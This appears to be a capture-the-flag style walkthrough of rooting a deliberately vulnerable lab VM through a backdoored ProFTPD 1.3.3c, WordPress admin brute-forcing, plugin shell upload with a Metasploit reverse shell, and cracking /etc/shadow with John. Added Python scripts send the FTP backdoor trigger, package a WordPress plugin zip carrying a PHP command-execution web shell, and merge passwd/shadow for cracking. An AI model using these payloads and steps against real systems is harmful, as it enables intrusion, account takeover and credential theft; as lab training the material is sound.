First of all, I downloaded the image and booted it up. I already had a Kali VM up to date and running. The network adapter on both VMs is set to Bridged Adapter, so both sit on the same LAN; because of this I am not going to note/list the IP discovery scans.
Ubuntu Host machine IP discovered: 172.30.124.91
Kali machine IP: 172.30.124.98
The Goal: “Your goal is to remotely attack the VM and gain root privileges.”
The results from the scan show three possible attack vectors: FTP on port 21 (the banner identifies it as ProFTPD 1.3.3c), SSH on port 22 and HTTP on port 80.
A quick Google for a ProFTPD 1.3.3c exploit turns up several links, the first of which is the Rapid7 page for the Metasploit module exploit/unix/ftp/proftpd_133c_backdoor (https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor). Let’s give it a go and see what happens.
Bingo, we have root access to the box. Pretty simple and straightforward exploit. Let’s see if there are any other exploits that we can take advantage of.
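For anyone wondering what the module actually does on the wire: the 1.3.3c tarball that was served from the project’s distribution mirror in late 2010 had been tampered with so that the FTP command HELP ACIDBITCHEZ made the daemon call setuid(0)/setgid(0) and hand the connection to /bin/sh. The module simply sends that trigger and then the command to run. The script below replays that exchange against a local stand-in daemon; it is an added example, not the write-up’s or the module’s code, and the server side is a constructed simulation that returns canned text and executes nothing. The banner and the id output are constructed.

```python
"""Replay of the ProFTPD 1.3.3c backdoor exchange against a local stand-in.

Added example. The server below only simulates the tampered daemon with
canned replies; it never runs a shell. The client is the part you would
point at a real host.
"""
import socket
import threading

TRIGGER = b"HELP ACIDBITCHEZ\r\n"
# Constructed banner in the format a 1.3.3c daemon greets with.
FAKE_BANNER = b"220 ProFTPD 1.3.3c Server (Debian) [::ffff:127.0.0.1]\r\n"
# Constructed stand-in for what the spawned root shell prints for `id`.
FAKE_ID_OUTPUT = b"uid=0(root) gid=0(root) groups=0(root)\n"


def start_fake_ftpd(backdoored):
    """Serve one client on an ephemeral loopback port; returns (port, thread)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def serve():
        conn, _ = listener.accept()
        listener.close()
        with conn, conn.makefile("rwb", buffering=0) as f:
            f.write(FAKE_BANNER)
            first = f.readline()   # what the client sends after the banner
            second = f.readline()  # the command the client wants run
            if backdoored and first.strip().upper() == TRIGGER.strip():
                # Real backdoor: no FTP reply at all, the socket now belongs
                # to /bin/sh. Here we just fake the output of `id`.
                f.write(FAKE_ID_OUTPUT if second.strip() == b"id" else b"")
            else:
                # A clean daemon treats the trigger as an unknown HELP topic.
                f.write(b"502 Unknown command '%s'.\r\n" % first.strip()[5:])
                f.write(b"500 Unknown command\r\n")
        # Closing the connection is the EOF the client waits for.

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return port, thread


def _read_line(sock):
    """Read one CRLF-terminated FTP line byte by byte, without over-reading."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        ch = sock.recv(1)
        if not ch:
            break
        buf += ch
    return bytes(buf)


def trigger_backdoor(host, port, command=b"id", timeout=3.0):
    """Send the module's two lines and collect whatever comes back.

    Returns the shell's output, or None when the daemon answered the trigger
    with an FTP status line (i.e. it is not the tampered build).
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _read_line(s)
        if b"ProFTPD 1.3.3c" not in banner:
            raise RuntimeError("banner does not look like 1.3.3c: %r" % banner)
        s.sendall(TRIGGER)
        s.sendall(command + b"\r\n")
        out = b""
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            out += chunk
    # A genuine reply to HELP is "<3 digits><space or dash>..."; shell output is not.
    if out[:3].isdigit() and out[3:4] in (b" ", b"-"):
        return None
    return out


if __name__ == "__main__":
    for flag in (True, False):
        port, t = start_fake_ftpd(backdoored=flag)
        print("backdoored" if flag else "clean", "->", trigger_backdoor("127.0.0.1", port))
        t.join()
```

The banner check is the part worth keeping in a real engagement: it is the same string nmap -sV reports, and the same string a defender should be grepping their inventory for, because the only fix for a tampered 1.3.3c install is to reinstall from a clean source.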
Browsed to http://172.30.124.91/ via Firefox.
Let’s have a look at the page source:
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
Not much going on there, so I decided to enumerate the site using OWASP ZAP’s forced browse option, which found http://172.30.124.91/secret; this appears to be a WordPress install with a wp-admin portal.
The source of http://172.30.124.91/secret references the hostname vtcsec rather than the IP, so the site’s own links will not resolve from the attacking machine as-is.
I updated /etc/hosts on the attacking machine to point that hostname at the target’s IP.
Browsed to the WordPress login page http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2Fvtcsec%2Fsecret%2Fwp-admin%2F&reauth=1. At this point I was not really sure what my next steps could/should be, so I spent a bit of time doing some research, which pointed me in the direction of WPScan (https://wpscan.org/).
wpscan --url http://vtcsec/secret/ came back with the following results:
Looking at the results, it has flagged and linked us to a couple of possible attack vectors. WPScan can also enumerate usernames, so I thought I would give that a go.
wpscan --url http://vtcsec/secret/ --enumerate u
Perfect, this has found a user account named admin. WPScan can also brute-force the login page with a wordlist. After a couple of invalid commands, I was able to kick off a brute-force attempt using the rockyou.txt wordlist that ships with Kali (on a fresh install it is still compressed as rockyou.txt.gz and needs a gunzip first).
wpscan --url http://vtcsec/secret/ --passwords /usr/share/wordlists/rockyou.txt -U admin
Valid combination found: username admin, password admin. Time to give them a try; we are in!
Now that we have access to the dashboard, it is time to do a little research into what we can do from here to gain access to the server itself.
So, after a fair amount of googling, I discovered a couple of possibilities, including uploading a fake theme or plugin with a PHP reverse shell inside it. I found the following guide (https://rstforums.com/forum/topic/108627-how-to-create-a-fake-wordpress-plugintheme-for-reverse-shell/). I ran through this and was able to get a shell connection. This seemed to break access to the site for me though, most likely something I was doing wrong. After tinkering around, removing the plugin and rebooting the Ubuntu box, I was able to access the WP dashboard again. Thinking of a real-world scenario, this could potentially kill the pentest as it disrupted the site. I shall revisit and try to figure out where I went wrong at a later date.
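On the packaging side, the thing that makes a zip a WordPress plugin is a top-level PHP file with a "Plugin Name:" header; WordPress includes that main file on every request once the plugin is activated, so a payload that blocks (a reverse shell waiting on its connection) in that file will stall the whole site. The layout that avoids this, and the one the Metasploit module output further down this page uses as well (a random plugin directory plus a separate .php requested directly), keeps the main file inert and puts the command runner in a second file. The script below builds such a zip; it is an added example, not code from the write-up or from the linked guide, and the slug "maintenance-helper" and the file name "cmd.php" are assumed names.

```python
"""Package a two-file WordPress plugin zip for the shell-upload route.

Added example. The slug and payload file name are assumptions; WordPress
extracts the archive under wp-content/plugins/ and recognises the plugin
by the header comment in the top-level PHP file.
"""
import io
import re
import zipfile

PLUGIN_SLUG = "maintenance-helper"   # assumed name
PAYLOAD_FILE = "cmd.php"             # assumed name

# Header comment is what WordPress reads to list the plugin; nothing else
# runs here, so activating the plugin cannot hang or break page rendering.
MAIN_PHP = """<?php
/*
Plugin Name: Maintenance Helper
Description: Upload container used during an authorised test.
Version: 0.1
*/
"""

# Requested directly at /wp-content/plugins/<slug>/cmd.php?c=id and never
# loaded by WordPress itself, so its execution is decoupled from the site.
PAYLOAD_PHP = """<?php
if (isset($_REQUEST['c'])) {
    header('Content-Type: text/plain');
    system($_REQUEST['c']);
}
"""


def build_plugin_zip(slug=PLUGIN_SLUG, payload_name=PAYLOAD_FILE, include_header=True):
    """Return zip bytes laid out as <slug>/<slug>.php plus <slug>/<payload>.

    include_header=False produces an archive WordPress will reject as
    'No valid plugins were found', which is the check plugin_name() mimics.
    """
    main = MAIN_PHP if include_header else "<?php\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", main)
        zf.writestr(f"{slug}/{payload_name}", PAYLOAD_PHP)
    return buf.getvalue()


def list_files(zip_bytes):
    """Sorted member names, handy for confirming the directory layout."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


def plugin_name(zip_bytes):
    """Mimic WordPress' detection: a top-level PHP file carrying a Plugin Name header."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.count("/") == 1 and name.endswith(".php"):
                text = zf.read(name).decode("utf-8", "replace")
                m = re.search(r"^\s*\*?\s*Plugin Name:\s*(.+)$", text, re.M)
                if m:
                    return m.group(1).strip()
    return None


def payload_url(site_url, slug=PLUGIN_SLUG, payload_name=PAYLOAD_FILE):
    """Where the runner is reachable once the zip has been installed."""
    return f"{site_url.rstrip('/')}/wp-content/plugins/{slug}/{payload_name}"


if __name__ == "__main__":
    data = build_plugin_zip()
    with open(f"{PLUGIN_SLUG}.zip", "wb") as fh:
        fh.write(data)
    print(list_files(data), plugin_name(data))
    print(payload_url("http://vtcsec/secret/"))
```

Upload the resulting zip through Plugins > Add New > Upload Plugin with the admin session, then request the payload URL directly; there is no need to activate the plugin at all, and deleting it from the Plugins page afterwards removes both files.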
I decided to look at the Metasploit route that I had also read about. Metasploit has a built-in exploit module, exploit/unix/webapp/wp_admin_shell_upload, and a reverse_tcp Meterpreter payload; hopefully we can use these to get a shell. I had also read that Kali ships a privilege-escalation script that searches for vulnerabilities and misconfigurations; it lives at /usr/bin/unix-privesc-check (https://github.com/pentestmonkey/unix-privesc-check). I plan to upload and run this script if I get shell access.
Started Metasploit, selected the wp_admin_shell_upload module and set the options as follows.
set PASSWORD admin
set RHOSTS vtcsec
set TARGETURI /secret
set USERNAME admin
set LHOST 172.30.124.98 (attacker machine)
With the options set, run the exploit:
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 172.30.124.98:4444
[*] Authenticating with WordPress using admin:admin…
[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload…
[*] Executing the payload at /secret/wp-content/plugins/dXfJcBYvbV/cPOhghZWYT.php…
[*] Sending stage (38247 bytes) to 172.30.124.91
[*] Meterpreter session 1 opened (172.30.124.98:4444 -> 172.30.124.91:40198) at 2019-03-06 12:01:48 +0000
[!] Tried to delete cPOhghZWYT.php, unknown result
[!] Tried to delete dXfJcBYvbV.php, unknown result
[!] Tried to delete ../dXfJcBYvbV, unknown result
To confirm that we are connected, and to see which user the web server is running our payload as, use the getuid command.
Attempted to upload the unix-privesc-check script, but got the following error:
Turns out I was just being an idiot and needed to name the file!
Ran the shell command to drop into a system shell. Checked the user again, using whoami this time. Then changed directory to /tmp, made the script executable with chmod +x unix-privesc-check and ran it with ./unix-privesc-check standard. Time to analyse the results.
The check has flagged that /etc/passwd is readable and writable by everyone. A world-writable /etc/passwd is a route to root in its own right, since anyone can append a UID 0 entry with a password hash of their choosing; the rest of this walkthrough takes a different path. I wanted to confirm that I could read it, using cat /etc/passwd.
At the very least we have a list of users to take a look at. Although the script didn’t flag anything about /etc/shadow, I wanted to check whether we had read access to it: cat /etc/shadow.
Yes we do, and it looks like we have a hash for the user marlinspike. From some previous googling I had stumbled onto this site (https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/), which I thought I might be able to use. So let’s run through it and see what happens.
Scrolled back up in the terminal and simply copied and pasted the contents of both passwd and shadow into separate files called passwd and shadow on the desktop of the Kali machine. I then ran unshadow /root/Desktop/passwd /root/Desktop/shadow > /root/Desktop/passwords.txt. Once the new file was generated on the desktop I chucked it at John the Ripper without any wordlist or flags. With no mode given, John starts in single-crack mode, which builds candidates from the login name and GECOS fields, so a password equal to the username falls almost immediately.
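What unshadow does is purely mechanical: it swaps the "x" in the second field of each /etc/passwd line for the hash from the matching /etc/shadow line, keeping the rest of the passwd line so John’s single-crack mode has the username and GECOS field to derive guesses from. The script below does that merge and the triage a practitioner does before firing up John: which entries actually carry a hash, what algorithm it is, and which accounts have a login shell worth trying over SSH. It also includes the permission test behind the unix-privesc-check finding above. This is an added example, not the write-up’s commands or John’s code; the passwd and shadow lines are constructed to mirror the target’s layout, and the hash shown for marlinspike is a placeholder, not the real one.

```python
"""Merge passwd and shadow the way `unshadow` does, then triage the result.

Added example. The sample files are constructed; the marlinspike hash is a
placeholder with the right prefix, not a real crypt(3) value.
"""
import os
import stat

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""
SHADOW_SAMPLE = """\
root:*:17596:0:99999:7:::
daemon:*:17596:0:99999:7:::
marlinspike:$6$c0nstructed$placeholderhashvalue:17596:0:99999:7:::
backup:*:17596:0:99999:7:::
"""

# Meaning of the "$id$" prefix on a crypt(3) hash; John picks its format from it.
HASH_TYPES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with field 2 replaced by the shadow hash (as `unshadow` does).

    Accounts with no shadow entry keep their passwd field; everything else
    on the passwd line is preserved for John's single-crack mode.
    """
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            user, hsh = line.split(":")[:2]
            hashes[user] = hsh
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(merged):
    """Map user -> hash type for entries that carry a real hash.

    '*', '!' and '!!' mark locked accounts, an empty field means no
    password, and 'x' means the hash never got merged in; none of those
    give John anything to work on.
    """
    out = {}
    for line in merged:
        user, hsh = line.split(":")[:2]
        if hsh in ("", "x", "*") or hsh.startswith("!"):
            continue
        if hsh.startswith("$"):
            out[user] = HASH_TYPES.get(hsh.split("$")[1], "unknown")
        else:
            out[user] = "descrypt"  # legacy 13-character DES hash has no prefix
    return out


def interactive_accounts(passwd_text):
    """Users with a real login shell: the shortlist worth trying over SSH."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "/false")):
            users.append(fields[0])
    return users


def world_writable_mode(mode):
    """True when the 'other' write bit is set, e.g. the 0666 unix-privesc-check flagged."""
    return bool(mode & stat.S_IWOTH)


def world_writable(path):
    """Same test against a real file, e.g. world_writable('/etc/passwd')."""
    return world_writable_mode(os.stat(path).st_mode)


if __name__ == "__main__":
    merged = unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)
    print("\n".join(merged))
    print("crackable:", crackable(merged))
    print("interactive:", interactive_accounts(PASSWD_SAMPLE))
    print("/etc/passwd world-writable:", world_writable("/etc/passwd"))
```

Feed the merged lines to John exactly as the write-up does (john passwords.txt); the hash-type map tells you up front whether you are looking at sha512crypt, which is slow enough that a targeted wordlist matters, or at something weaker.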
Just like the WordPress admin account, it appears the username and password are the same: username marlinspike, password marlinspike. Let’s see if we can SSH in.
ssh marlinspike@vtcsec, and after a spat of fat-finger-itis I was in.
First things first, let’s use the history command to see what has been run. There are 186 previous commands in the marlinspike account’s history. Although I can’t see any root login details in plain text, I can see this user has run commands using sudo, which elevates their permissions. A quick look at which groups marlinspike is a member of confirms it is in the sudo group.
A quick look at the sudoers file (or sudo -l) confirms exactly what this gives us permission to run.
sudo -i and voilà: root@vtcsec
From here I am fairly sure I could look at SSH keys and do something with them. There are likely a couple of other exploits, maybe easier ones than those I have muddled my way through. For now, I am going to have a break from this one and possibly look at other people’s walkthroughs to get an idea of what I have missed.